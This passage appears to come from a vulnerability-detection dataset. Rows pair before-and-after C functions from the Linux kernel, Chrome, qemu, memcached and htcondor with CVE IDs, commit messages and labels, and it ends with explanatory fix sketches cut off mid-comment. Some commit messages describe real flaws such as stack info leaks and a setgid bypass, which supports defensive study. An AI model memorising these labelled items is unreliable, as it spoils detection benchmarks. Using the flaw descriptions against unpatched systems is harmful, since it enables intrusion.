return 0;
}
else {
if(_longMsg) {
return _longMsg->isDataMD5ed();
}
else { // short message
return _shortMsg.isDataMD5ed();
}
}
}
|
const char * SafeSock :: isIncomingDataMD5ed()
{
char c;
if (!peek(c)) {
return 0;
}
else {
if(_longMsg) {
return _longMsg->isDataMD5ed();
}
else { // short message
return _shortMsg.isDataMD5ed();
}
}
}
|
CPP
|
htcondor
| 0 |
CVE-2017-5120
|
https://www.cvedetails.com/cve/CVE-2017-5120/
| null |
https://github.com/chromium/chromium/commit/b7277af490d28ac7f802c015bb0ff31395768556
|
b7277af490d28ac7f802c015bb0ff31395768556
|
bindings: Support "attribute FrozenArray<T>?"
Adds a quick hack to support a case of "attribute FrozenArray<T>?".
Bug: 1028047
Change-Id: Ib3cecc4beb6bcc0fb0dbc667aca595454cc90c86
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1933866
Reviewed-by: Hitoshi Yoshida <peria@chromium.org>
Commit-Queue: Yuki Shiino <yukishiino@chromium.org>
Cr-Commit-Position: refs/heads/master@{#718676}
|
void V8TestObject::LocationPutForwardsAttributeGetterCallback(const v8::FunctionCallbackInfo<v8::Value>& info) {
RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT(info.GetIsolate(), "Blink_TestObject_locationPutForwards_Getter");
test_object_v8_internal::LocationPutForwardsAttributeGetter(info);
}
|
void V8TestObject::LocationPutForwardsAttributeGetterCallback(const v8::FunctionCallbackInfo<v8::Value>& info) {
RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT(info.GetIsolate(), "Blink_TestObject_locationPutForwards_Getter");
test_object_v8_internal::LocationPutForwardsAttributeGetter(info);
}
|
C
|
Chrome
| 0 |
CVE-2011-4112
|
https://www.cvedetails.com/cve/CVE-2011-4112/
|
CWE-264
|
https://github.com/torvalds/linux/commit/550fd08c2cebad61c548def135f67aba284c6162
|
550fd08c2cebad61c548def135f67aba284c6162
|
net: Audit drivers to identify those needing IFF_TX_SKB_SHARING cleared
After the last patch, we are left in a state in which only drivers calling
ether_setup have IFF_TX_SKB_SHARING set (we assume that drivers touching real
hardware call ether_setup for their net_devices and don't hold any state in
their skbs). There are a handful of drivers that violate this assumption, of
course, and need to be fixed up. This patch identifies those drivers and marks
them as not being able to support the safe transmission of skbs by clearing the
IFF_TX_SKB_SHARING flag in priv_flags
Signed-off-by: Neil Horman <nhorman@tuxdriver.com>
CC: Karsten Keil <isdn@linux-pingi.de>
CC: "David S. Miller" <davem@davemloft.net>
CC: Jay Vosburgh <fubar@us.ibm.com>
CC: Andy Gospodarek <andy@greyhouse.net>
CC: Patrick McHardy <kaber@trash.net>
CC: Krzysztof Halasa <khc@pm.waw.pl>
CC: "John W. Linville" <linville@tuxdriver.com>
CC: Greg Kroah-Hartman <gregkh@suse.de>
CC: Marcel Holtmann <marcel@holtmann.org>
CC: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
isdn_net_getcfg(isdn_net_ioctl_cfg * cfg)
{
isdn_net_dev *p = isdn_net_findif(cfg->name);
if (p) {
isdn_net_local *lp = p->local;
strcpy(cfg->eaz, lp->msn);
cfg->exclusive = lp->exclusive;
if (lp->pre_device >= 0) {
sprintf(cfg->drvid, "%s,%d", dev->drvid[lp->pre_device],
lp->pre_channel);
} else
cfg->drvid[0] = '\0';
cfg->onhtime = lp->onhtime;
cfg->charge = lp->charge;
cfg->l2_proto = lp->l2_proto;
cfg->l3_proto = lp->l3_proto;
cfg->p_encap = lp->p_encap;
cfg->secure = (lp->flags & ISDN_NET_SECURE) ? 1 : 0;
cfg->callback = 0;
if (lp->flags & ISDN_NET_CALLBACK)
cfg->callback = 1;
if (lp->flags & ISDN_NET_CBOUT)
cfg->callback = 2;
cfg->cbhup = (lp->flags & ISDN_NET_CBHUP) ? 1 : 0;
cfg->dialmode = lp->flags & ISDN_NET_DIALMODE_MASK;
cfg->chargehup = (lp->hupflags & 4) ? 1 : 0;
cfg->ihup = (lp->hupflags & 8) ? 1 : 0;
cfg->cbdelay = lp->cbdelay;
cfg->dialmax = lp->dialmax;
cfg->triggercps = lp->triggercps;
cfg->slavedelay = lp->slavedelay / HZ;
cfg->chargeint = (lp->hupflags & ISDN_CHARGEHUP) ?
(lp->chargeint / HZ) : 0;
cfg->pppbind = lp->pppbind;
cfg->dialtimeout = lp->dialtimeout >= 0 ? lp->dialtimeout / HZ : -1;
cfg->dialwait = lp->dialwait / HZ;
if (lp->slave) {
if (strlen(lp->slave->name) >= 10)
strcpy(cfg->slave, "too-long");
else
strcpy(cfg->slave, lp->slave->name);
} else
cfg->slave[0] = '\0';
if (lp->master) {
if (strlen(lp->master->name) >= 10)
strcpy(cfg->master, "too-long");
else
strcpy(cfg->master, lp->master->name);
} else
cfg->master[0] = '\0';
return 0;
}
return -ENODEV;
}
|
isdn_net_getcfg(isdn_net_ioctl_cfg * cfg)
{
isdn_net_dev *p = isdn_net_findif(cfg->name);
if (p) {
isdn_net_local *lp = p->local;
strcpy(cfg->eaz, lp->msn);
cfg->exclusive = lp->exclusive;
if (lp->pre_device >= 0) {
sprintf(cfg->drvid, "%s,%d", dev->drvid[lp->pre_device],
lp->pre_channel);
} else
cfg->drvid[0] = '\0';
cfg->onhtime = lp->onhtime;
cfg->charge = lp->charge;
cfg->l2_proto = lp->l2_proto;
cfg->l3_proto = lp->l3_proto;
cfg->p_encap = lp->p_encap;
cfg->secure = (lp->flags & ISDN_NET_SECURE) ? 1 : 0;
cfg->callback = 0;
if (lp->flags & ISDN_NET_CALLBACK)
cfg->callback = 1;
if (lp->flags & ISDN_NET_CBOUT)
cfg->callback = 2;
cfg->cbhup = (lp->flags & ISDN_NET_CBHUP) ? 1 : 0;
cfg->dialmode = lp->flags & ISDN_NET_DIALMODE_MASK;
cfg->chargehup = (lp->hupflags & 4) ? 1 : 0;
cfg->ihup = (lp->hupflags & 8) ? 1 : 0;
cfg->cbdelay = lp->cbdelay;
cfg->dialmax = lp->dialmax;
cfg->triggercps = lp->triggercps;
cfg->slavedelay = lp->slavedelay / HZ;
cfg->chargeint = (lp->hupflags & ISDN_CHARGEHUP) ?
(lp->chargeint / HZ) : 0;
cfg->pppbind = lp->pppbind;
cfg->dialtimeout = lp->dialtimeout >= 0 ? lp->dialtimeout / HZ : -1;
cfg->dialwait = lp->dialwait / HZ;
if (lp->slave) {
if (strlen(lp->slave->name) >= 10)
strcpy(cfg->slave, "too-long");
else
strcpy(cfg->slave, lp->slave->name);
} else
cfg->slave[0] = '\0';
if (lp->master) {
if (strlen(lp->master->name) >= 10)
strcpy(cfg->master, "too-long");
else
strcpy(cfg->master, lp->master->name);
} else
cfg->master[0] = '\0';
return 0;
}
return -ENODEV;
}
|
C
|
linux
| 0 |
CVE-2016-6836
|
https://www.cvedetails.com/cve/CVE-2016-6836/
|
CWE-200
|
https://git.qemu.org/?p=qemu.git;a=commit;h=fdda170e50b8af062cf5741e12c4fb5e57a2eacf
|
fdda170e50b8af062cf5741e12c4fb5e57a2eacf
| null |
vmxnet3_is_registered_vlan(VMXNET3State *s, const void *data)
{
uint16_t vlan_tag = eth_get_pkt_tci(data) & VLAN_VID_MASK;
if (IS_SPECIAL_VLAN_ID(vlan_tag)) {
return true;
}
return VMXNET3_VFTABLE_ENTRY_IS_SET(s->vlan_table, vlan_tag);
}
|
vmxnet3_is_registered_vlan(VMXNET3State *s, const void *data)
{
uint16_t vlan_tag = eth_get_pkt_tci(data) & VLAN_VID_MASK;
if (IS_SPECIAL_VLAN_ID(vlan_tag)) {
return true;
}
return VMXNET3_VFTABLE_ENTRY_IS_SET(s->vlan_table, vlan_tag);
}
|
C
|
qemu
| 0 |
CVE-2010-1152
|
https://www.cvedetails.com/cve/CVE-2010-1152/
|
CWE-20
|
https://github.com/memcached/memcached/commit/d9cd01ede97f4145af9781d448c62a3318952719
|
d9cd01ede97f4145af9781d448c62a3318952719
|
Use strncmp when checking for large ascii multigets.
|
static void process_stat_settings(ADD_STAT add_stats, void *c) {
assert(add_stats);
APPEND_STAT("maxbytes", "%u", (unsigned int)settings.maxbytes);
APPEND_STAT("maxconns", "%d", settings.maxconns);
APPEND_STAT("tcpport", "%d", settings.port);
APPEND_STAT("udpport", "%d", settings.udpport);
APPEND_STAT("inter", "%s", settings.inter ? settings.inter : "NULL");
APPEND_STAT("verbosity", "%d", settings.verbose);
APPEND_STAT("oldest", "%lu", (unsigned long)settings.oldest_live);
APPEND_STAT("evictions", "%s", settings.evict_to_free ? "on" : "off");
APPEND_STAT("domain_socket", "%s",
settings.socketpath ? settings.socketpath : "NULL");
APPEND_STAT("umask", "%o", settings.access);
APPEND_STAT("growth_factor", "%.2f", settings.factor);
APPEND_STAT("chunk_size", "%d", settings.chunk_size);
APPEND_STAT("num_threads", "%d", settings.num_threads);
APPEND_STAT("stat_key_prefix", "%c", settings.prefix_delimiter);
APPEND_STAT("detail_enabled", "%s",
settings.detail_enabled ? "yes" : "no");
APPEND_STAT("reqs_per_event", "%d", settings.reqs_per_event);
APPEND_STAT("cas_enabled", "%s", settings.use_cas ? "yes" : "no");
APPEND_STAT("tcp_backlog", "%d", settings.backlog);
APPEND_STAT("binding_protocol", "%s",
prot_text(settings.binding_protocol));
APPEND_STAT("item_size_max", "%d", settings.item_size_max);
}
|
static void process_stat_settings(ADD_STAT add_stats, void *c) {
assert(add_stats);
APPEND_STAT("maxbytes", "%u", (unsigned int)settings.maxbytes);
APPEND_STAT("maxconns", "%d", settings.maxconns);
APPEND_STAT("tcpport", "%d", settings.port);
APPEND_STAT("udpport", "%d", settings.udpport);
APPEND_STAT("inter", "%s", settings.inter ? settings.inter : "NULL");
APPEND_STAT("verbosity", "%d", settings.verbose);
APPEND_STAT("oldest", "%lu", (unsigned long)settings.oldest_live);
APPEND_STAT("evictions", "%s", settings.evict_to_free ? "on" : "off");
APPEND_STAT("domain_socket", "%s",
settings.socketpath ? settings.socketpath : "NULL");
APPEND_STAT("umask", "%o", settings.access);
APPEND_STAT("growth_factor", "%.2f", settings.factor);
APPEND_STAT("chunk_size", "%d", settings.chunk_size);
APPEND_STAT("num_threads", "%d", settings.num_threads);
APPEND_STAT("stat_key_prefix", "%c", settings.prefix_delimiter);
APPEND_STAT("detail_enabled", "%s",
settings.detail_enabled ? "yes" : "no");
APPEND_STAT("reqs_per_event", "%d", settings.reqs_per_event);
APPEND_STAT("cas_enabled", "%s", settings.use_cas ? "yes" : "no");
APPEND_STAT("tcp_backlog", "%d", settings.backlog);
APPEND_STAT("binding_protocol", "%s",
prot_text(settings.binding_protocol));
APPEND_STAT("item_size_max", "%d", settings.item_size_max);
}
|
C
|
memcached
| 0 |
CVE-2014-2672
|
https://www.cvedetails.com/cve/CVE-2014-2672/
|
CWE-362
|
https://github.com/torvalds/linux/commit/21f8aaee0c62708654988ce092838aa7df4d25d8
|
21f8aaee0c62708654988ce092838aa7df4d25d8
|
ath9k: protect tid->sched check
We check tid->sched without a lock taken on ath_tx_aggr_sleep(). That
is a race condition which can result in doing list_del(&tid->list) twice
(the second time with a poisoned list node) and cause a crash like the one shown below:
[424271.637220] BUG: unable to handle kernel paging request at 00100104
[424271.637328] IP: [<f90fc072>] ath_tx_aggr_sleep+0x62/0xe0 [ath9k]
...
[424271.639953] Call Trace:
[424271.639998] [<f90f6900>] ? ath9k_get_survey+0x110/0x110 [ath9k]
[424271.640083] [<f90f6942>] ath9k_sta_notify+0x42/0x50 [ath9k]
[424271.640177] [<f809cfef>] sta_ps_start+0x8f/0x1c0 [mac80211]
[424271.640258] [<c10f730e>] ? free_compound_page+0x2e/0x40
[424271.640346] [<f809e915>] ieee80211_rx_handlers+0x9d5/0x2340 [mac80211]
[424271.640437] [<c112f048>] ? kmem_cache_free+0x1d8/0x1f0
[424271.640510] [<c1345a84>] ? kfree_skbmem+0x34/0x90
[424271.640578] [<c10fc23c>] ? put_page+0x2c/0x40
[424271.640640] [<c1345a84>] ? kfree_skbmem+0x34/0x90
[424271.640706] [<c1345a84>] ? kfree_skbmem+0x34/0x90
[424271.640787] [<f809dde3>] ? ieee80211_rx_handlers_result+0x73/0x1d0 [mac80211]
[424271.640897] [<f80a07a0>] ieee80211_prepare_and_rx_handle+0x520/0xad0 [mac80211]
[424271.641009] [<f809e22d>] ? ieee80211_rx_handlers+0x2ed/0x2340 [mac80211]
[424271.641104] [<c13846ce>] ? ip_output+0x7e/0xd0
[424271.641182] [<f80a1057>] ieee80211_rx+0x307/0x7c0 [mac80211]
[424271.641266] [<f90fa6ee>] ath_rx_tasklet+0x88e/0xf70 [ath9k]
[424271.641358] [<f80a0f2c>] ? ieee80211_rx+0x1dc/0x7c0 [mac80211]
[424271.641445] [<f90f82db>] ath9k_tasklet+0xcb/0x130 [ath9k]
Bug report:
https://bugzilla.kernel.org/show_bug.cgi?id=70551
Reported-and-tested-by: Max Sydorenko <maxim.stargazer@gmail.com>
Cc: stable@vger.kernel.org
Signed-off-by: Stanislaw Gruszka <sgruszka@redhat.com>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
|
void ath_tx_cabq(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
struct sk_buff *skb)
{
struct ath_softc *sc = hw->priv;
struct ath_tx_control txctl = {
.txq = sc->beacon.cabq
};
struct ath_tx_info info = {};
struct ieee80211_hdr *hdr;
struct ath_buf *bf_tail = NULL;
struct ath_buf *bf;
LIST_HEAD(bf_q);
int duration = 0;
int max_duration;
max_duration =
sc->cur_beacon_conf.beacon_interval * 1000 *
sc->cur_beacon_conf.dtim_period / ATH_BCBUF;
do {
struct ath_frame_info *fi = get_frame_info(skb);
if (ath_tx_prepare(hw, skb, &txctl))
break;
bf = ath_tx_setup_buffer(sc, txctl.txq, NULL, skb);
if (!bf)
break;
bf->bf_lastbf = bf;
ath_set_rates(vif, NULL, bf);
ath_buf_set_rate(sc, bf, &info, fi->framelen, false);
duration += info.rates[0].PktDuration;
if (bf_tail)
bf_tail->bf_next = bf;
list_add_tail(&bf->list, &bf_q);
bf_tail = bf;
skb = NULL;
if (duration > max_duration)
break;
skb = ieee80211_get_buffered_bc(hw, vif);
} while(skb);
if (skb)
ieee80211_free_txskb(hw, skb);
if (list_empty(&bf_q))
return;
bf = list_first_entry(&bf_q, struct ath_buf, list);
hdr = (struct ieee80211_hdr *) bf->bf_mpdu->data;
if (hdr->frame_control & IEEE80211_FCTL_MOREDATA) {
hdr->frame_control &= ~IEEE80211_FCTL_MOREDATA;
dma_sync_single_for_device(sc->dev, bf->bf_buf_addr,
sizeof(*hdr), DMA_TO_DEVICE);
}
ath_txq_lock(sc, txctl.txq);
ath_tx_fill_desc(sc, bf, txctl.txq, 0);
ath_tx_txqaddbuf(sc, txctl.txq, &bf_q, false);
TX_STAT_INC(txctl.txq->axq_qnum, queued);
ath_txq_unlock(sc, txctl.txq);
}
|
void ath_tx_cabq(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
struct sk_buff *skb)
{
struct ath_softc *sc = hw->priv;
struct ath_tx_control txctl = {
.txq = sc->beacon.cabq
};
struct ath_tx_info info = {};
struct ieee80211_hdr *hdr;
struct ath_buf *bf_tail = NULL;
struct ath_buf *bf;
LIST_HEAD(bf_q);
int duration = 0;
int max_duration;
max_duration =
sc->cur_beacon_conf.beacon_interval * 1000 *
sc->cur_beacon_conf.dtim_period / ATH_BCBUF;
do {
struct ath_frame_info *fi = get_frame_info(skb);
if (ath_tx_prepare(hw, skb, &txctl))
break;
bf = ath_tx_setup_buffer(sc, txctl.txq, NULL, skb);
if (!bf)
break;
bf->bf_lastbf = bf;
ath_set_rates(vif, NULL, bf);
ath_buf_set_rate(sc, bf, &info, fi->framelen, false);
duration += info.rates[0].PktDuration;
if (bf_tail)
bf_tail->bf_next = bf;
list_add_tail(&bf->list, &bf_q);
bf_tail = bf;
skb = NULL;
if (duration > max_duration)
break;
skb = ieee80211_get_buffered_bc(hw, vif);
} while(skb);
if (skb)
ieee80211_free_txskb(hw, skb);
if (list_empty(&bf_q))
return;
bf = list_first_entry(&bf_q, struct ath_buf, list);
hdr = (struct ieee80211_hdr *) bf->bf_mpdu->data;
if (hdr->frame_control & IEEE80211_FCTL_MOREDATA) {
hdr->frame_control &= ~IEEE80211_FCTL_MOREDATA;
dma_sync_single_for_device(sc->dev, bf->bf_buf_addr,
sizeof(*hdr), DMA_TO_DEVICE);
}
ath_txq_lock(sc, txctl.txq);
ath_tx_fill_desc(sc, bf, txctl.txq, 0);
ath_tx_txqaddbuf(sc, txctl.txq, &bf_q, false);
TX_STAT_INC(txctl.txq->axq_qnum, queued);
ath_txq_unlock(sc, txctl.txq);
}
|
C
|
linux
| 0 |
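The ath9k commit message above attributes the crash to testing tid->sched without the queue lock, which lets two paths unlink the same list entry. The sketch below is a generic user-space illustration of the fixed pattern (check and unlink under one lock); struct tid_state and tid_sleep are invented names, not the driver's API.

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

/* Minimal stand-ins for the per-TID state: a "scheduled" flag and
 * membership in a queue, both of which must be observed atomically. */
struct tid_state {
    bool scheduled;
    bool on_list;
    pthread_mutex_t lock;
};

/* Fixed pattern: take the lock *before* testing the flag, so two
 * concurrent sleep handlers cannot both see scheduled==true and both
 * try to unlink the entry. */
static void tid_sleep(struct tid_state *tid)
{
    pthread_mutex_lock(&tid->lock);
    if (tid->scheduled && tid->on_list) {
        tid->on_list = false;      /* stands in for list_del(&tid->list) */
        tid->scheduled = false;
    }
    pthread_mutex_unlock(&tid->lock);
}

int main(void)
{
    struct tid_state tid = { true, true, PTHREAD_MUTEX_INITIALIZER };
    tid_sleep(&tid);
    tid_sleep(&tid);               /* second call is now harmless */
    printf("on_list=%d scheduled=%d\n", tid.on_list, tid.scheduled);
    return 0;
}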
CVE-2017-9059
|
https://www.cvedetails.com/cve/CVE-2017-9059/
|
CWE-404
|
https://github.com/torvalds/linux/commit/c70422f760c120480fee4de6c38804c72aa26bc1
|
c70422f760c120480fee4de6c38804c72aa26bc1
|
Merge tag 'nfsd-4.12' of git://linux-nfs.org/~bfields/linux
Pull nfsd updates from Bruce Fields:
"Another RDMA update from Chuck Lever, and a bunch of miscellaneous
bugfixes"
* tag 'nfsd-4.12' of git://linux-nfs.org/~bfields/linux: (26 commits)
nfsd: Fix up the "supattr_exclcreat" attributes
nfsd: encoders mustn't use unitialized values in error cases
nfsd: fix undefined behavior in nfsd4_layout_verify
lockd: fix lockd shutdown race
NFSv4: Fix callback server shutdown
SUNRPC: Refactor svc_set_num_threads()
NFSv4.x/callback: Create the callback service through svc_create_pooled
lockd: remove redundant check on block
svcrdma: Clean out old XDR encoders
svcrdma: Remove the req_map cache
svcrdma: Remove unused RDMA Write completion handler
svcrdma: Reduce size of sge array in struct svc_rdma_op_ctxt
svcrdma: Clean up RPC-over-RDMA backchannel reply processing
svcrdma: Report Write/Reply chunk overruns
svcrdma: Clean up RDMA_ERROR path
svcrdma: Use rdma_rw API in RPC reply path
svcrdma: Introduce local rdma_rw API helpers
svcrdma: Clean up svc_rdma_get_inv_rkey()
svcrdma: Add helper to save pages under I/O
svcrdma: Eliminate RPCRDMA_SQ_DEPTH_MULT
...
|
nfsd4_close(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
struct nfsd4_close *close)
{
__be32 status;
struct nfs4_ol_stateid *stp;
struct net *net = SVC_NET(rqstp);
struct nfsd_net *nn = net_generic(net, nfsd_net_id);
dprintk("NFSD: nfsd4_close on file %pd\n",
cstate->current_fh.fh_dentry);
status = nfs4_preprocess_seqid_op(cstate, close->cl_seqid,
&close->cl_stateid,
NFS4_OPEN_STID|NFS4_CLOSED_STID,
&stp, nn);
nfsd4_bump_seqid(cstate, status);
if (status)
goto out;
nfs4_inc_and_copy_stateid(&close->cl_stateid, &stp->st_stid);
mutex_unlock(&stp->st_mutex);
nfsd4_close_open_stateid(stp);
/* put reference from nfs4_preprocess_seqid_op */
nfs4_put_stid(&stp->st_stid);
out:
return status;
}
|
nfsd4_close(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
struct nfsd4_close *close)
{
__be32 status;
struct nfs4_ol_stateid *stp;
struct net *net = SVC_NET(rqstp);
struct nfsd_net *nn = net_generic(net, nfsd_net_id);
dprintk("NFSD: nfsd4_close on file %pd\n",
cstate->current_fh.fh_dentry);
status = nfs4_preprocess_seqid_op(cstate, close->cl_seqid,
&close->cl_stateid,
NFS4_OPEN_STID|NFS4_CLOSED_STID,
&stp, nn);
nfsd4_bump_seqid(cstate, status);
if (status)
goto out;
nfs4_inc_and_copy_stateid(&close->cl_stateid, &stp->st_stid);
mutex_unlock(&stp->st_mutex);
nfsd4_close_open_stateid(stp);
/* put reference from nfs4_preprocess_seqid_op */
nfs4_put_stid(&stp->st_stid);
out:
return status;
}
|
C
|
linux
| 0 |
CVE-2012-6544
|
https://www.cvedetails.com/cve/CVE-2012-6544/
|
CWE-200
|
https://github.com/torvalds/linux/commit/e15ca9a0ef9a86f0477530b0f44a725d67f889ee
|
e15ca9a0ef9a86f0477530b0f44a725d67f889ee
|
Bluetooth: HCI - Fix info leak in getsockopt(HCI_FILTER)
The HCI code fails to initialize the two padding bytes of struct
hci_ufilter before copying it to userland -- thus leaking two bytes of
kernel stack. Add an explicit memset(0) before filling the
structure to avoid the info leak.
Signed-off-by: Mathias Krause <minipli@googlemail.com>
Cc: Marcel Holtmann <marcel@holtmann.org>
Cc: Gustavo Padovan <gustavo@padovan.org>
Cc: Johan Hedberg <johan.hedberg@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
unsigned long arg)
{
struct sock *sk = sock->sk;
void __user *argp = (void __user *) arg;
int err;
BT_DBG("cmd %x arg %lx", cmd, arg);
switch (cmd) {
case HCIGETDEVLIST:
return hci_get_dev_list(argp);
case HCIGETDEVINFO:
return hci_get_dev_info(argp);
case HCIGETCONNLIST:
return hci_get_conn_list(argp);
case HCIDEVUP:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_open(arg);
case HCIDEVDOWN:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_close(arg);
case HCIDEVRESET:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_reset(arg);
case HCIDEVRESTAT:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_reset_stat(arg);
case HCISETSCAN:
case HCISETAUTH:
case HCISETENCRYPT:
case HCISETPTYPE:
case HCISETLINKPOL:
case HCISETLINKMODE:
case HCISETACLMTU:
case HCISETSCOMTU:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_cmd(cmd, argp);
case HCIINQUIRY:
return hci_inquiry(argp);
default:
lock_sock(sk);
err = hci_sock_bound_ioctl(sk, cmd, arg);
release_sock(sk);
return err;
}
}
|
static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
unsigned long arg)
{
struct sock *sk = sock->sk;
void __user *argp = (void __user *) arg;
int err;
BT_DBG("cmd %x arg %lx", cmd, arg);
switch (cmd) {
case HCIGETDEVLIST:
return hci_get_dev_list(argp);
case HCIGETDEVINFO:
return hci_get_dev_info(argp);
case HCIGETCONNLIST:
return hci_get_conn_list(argp);
case HCIDEVUP:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_open(arg);
case HCIDEVDOWN:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_close(arg);
case HCIDEVRESET:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_reset(arg);
case HCIDEVRESTAT:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_reset_stat(arg);
case HCISETSCAN:
case HCISETAUTH:
case HCISETENCRYPT:
case HCISETPTYPE:
case HCISETLINKPOL:
case HCISETLINKMODE:
case HCISETACLMTU:
case HCISETSCOMTU:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_cmd(cmd, argp);
case HCIINQUIRY:
return hci_inquiry(argp);
default:
lock_sock(sk);
err = hci_sock_bound_ioctl(sk, cmd, arg);
release_sock(sk);
return err;
}
}
|
C
|
linux
| 0 |
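The CVE-2012-6544 entry above describes an info leak caused by the two implicit padding bytes of struct hci_ufilter being copied to userspace uninitialized, with the fix being an explicit memset(0) before the structure is filled. Below is a minimal userspace sketch of that pattern, assuming an illustrative struct layout (the struct name, fields and values are not the real hci_ufilter definition, and the kernel's copy_to_user() step is replaced by a byte dump):
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Illustrative struct with two implicit padding bytes after 'opcode'
 * on common ABIs; this is an assumed layout, not the real hci_ufilter. */
struct ufilter_like {
    uint32_t type_mask;
    uint16_t opcode;
    /* the compiler inserts 2 padding bytes here */
    uint64_t event_mask;
};

/* Safe pattern from the fix: zero the whole object before filling it,
 * so the padding bytes never carry stale stack contents. */
static void fill_filter(struct ufilter_like *uf)
{
    memset(uf, 0, sizeof(*uf));   /* the added memset(0) */
    uf->type_mask  = 0x10;
    uf->opcode     = 0x0c05;
    uf->event_mask = 0xffffULL;
}

int main(void)
{
    struct ufilter_like uf;
    fill_filter(&uf);
    /* In the kernel the next step would be copy_to_user(); dumping the
     * raw bytes here shows that none of them are left uninitialized. */
    const unsigned char *p = (const unsigned char *)&uf;
    for (size_t i = 0; i < sizeof(uf); i++)
        printf("%02x ", (unsigned)p[i]);
    printf("\n");
    return 0;
}
Without the memset, member-wise assignment alone would leave the two padding bytes holding whatever was previously on the stack, which is exactly what leaked through getsockopt(HCI_FILTER).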
CVE-2016-7097
|
https://www.cvedetails.com/cve/CVE-2016-7097/
|
CWE-285
|
https://github.com/torvalds/linux/commit/073931017b49d9458aa351605b43a7e34598caef
|
073931017b49d9458aa351605b43a7e34598caef
|
posix_acl: Clear SGID bit when setting file permissions
When file permissions are modified via chmod(2) and the user is not in
the owning group or capable of CAP_FSETID, the setgid bit is cleared in
inode_change_ok(). Setting a POSIX ACL via setxattr(2) sets the file
permissions as well as the new ACL, but doesn't clear the setgid bit in
a similar way; this allows to bypass the check in chmod(2). Fix that.
References: CVE-2016-7097
Reviewed-by: Christoph Hellwig <hch@lst.de>
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
|
xfs_acl_from_disk(
const struct xfs_acl *aclp,
int len,
int max_entries)
{
struct posix_acl_entry *acl_e;
struct posix_acl *acl;
const struct xfs_acl_entry *ace;
unsigned int count, i;
if (len < sizeof(*aclp))
return ERR_PTR(-EFSCORRUPTED);
count = be32_to_cpu(aclp->acl_cnt);
if (count > max_entries || XFS_ACL_SIZE(count) != len)
return ERR_PTR(-EFSCORRUPTED);
acl = posix_acl_alloc(count, GFP_KERNEL);
if (!acl)
return ERR_PTR(-ENOMEM);
for (i = 0; i < count; i++) {
acl_e = &acl->a_entries[i];
ace = &aclp->acl_entry[i];
/*
* The tag is 32 bits on disk and 16 bits in core.
*
* Because every access to it goes through the core
* format first this is not a problem.
*/
acl_e->e_tag = be32_to_cpu(ace->ae_tag);
acl_e->e_perm = be16_to_cpu(ace->ae_perm);
switch (acl_e->e_tag) {
case ACL_USER:
acl_e->e_uid = xfs_uid_to_kuid(be32_to_cpu(ace->ae_id));
break;
case ACL_GROUP:
acl_e->e_gid = xfs_gid_to_kgid(be32_to_cpu(ace->ae_id));
break;
case ACL_USER_OBJ:
case ACL_GROUP_OBJ:
case ACL_MASK:
case ACL_OTHER:
break;
default:
goto fail;
}
}
return acl;
fail:
posix_acl_release(acl);
return ERR_PTR(-EINVAL);
}
|
xfs_acl_from_disk(
const struct xfs_acl *aclp,
int len,
int max_entries)
{
struct posix_acl_entry *acl_e;
struct posix_acl *acl;
const struct xfs_acl_entry *ace;
unsigned int count, i;
if (len < sizeof(*aclp))
return ERR_PTR(-EFSCORRUPTED);
count = be32_to_cpu(aclp->acl_cnt);
if (count > max_entries || XFS_ACL_SIZE(count) != len)
return ERR_PTR(-EFSCORRUPTED);
acl = posix_acl_alloc(count, GFP_KERNEL);
if (!acl)
return ERR_PTR(-ENOMEM);
for (i = 0; i < count; i++) {
acl_e = &acl->a_entries[i];
ace = &aclp->acl_entry[i];
/*
* The tag is 32 bits on disk and 16 bits in core.
*
* Because every access to it goes through the core
* format first this is not a problem.
*/
acl_e->e_tag = be32_to_cpu(ace->ae_tag);
acl_e->e_perm = be16_to_cpu(ace->ae_perm);
switch (acl_e->e_tag) {
case ACL_USER:
acl_e->e_uid = xfs_uid_to_kuid(be32_to_cpu(ace->ae_id));
break;
case ACL_GROUP:
acl_e->e_gid = xfs_gid_to_kgid(be32_to_cpu(ace->ae_id));
break;
case ACL_USER_OBJ:
case ACL_GROUP_OBJ:
case ACL_MASK:
case ACL_OTHER:
break;
default:
goto fail;
}
}
return acl;
fail:
posix_acl_release(acl);
return ERR_PTR(-EINVAL);
}
|
C
|
linux
| 0 |
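The CVE-2016-7097 commit message above explains the missing check: setting a POSIX ACL via setxattr(2) updates the file mode but, unlike chmod(2), did not clear the setgid bit when the caller is outside the owning group and lacks CAP_FSETID. The sketch below models only that decision rule in userspace C; the helper names and the two predicates are illustrative stand-ins (the kernel uses its own group-membership and capability checks), not the actual fix code:
#include <stdbool.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Illustrative predicates standing in for the kernel's group-membership
 * and CAP_FSETID checks; they ignore supplementary groups on purpose. */
static bool caller_in_owning_group(gid_t file_gid, gid_t caller_gid)
{
    return file_gid == caller_gid;
}

static bool caller_has_fsetid(void)
{
    return false;   /* assume an unprivileged caller for the demo */
}

/* Rule described in the fix: when permissions change as a side effect of
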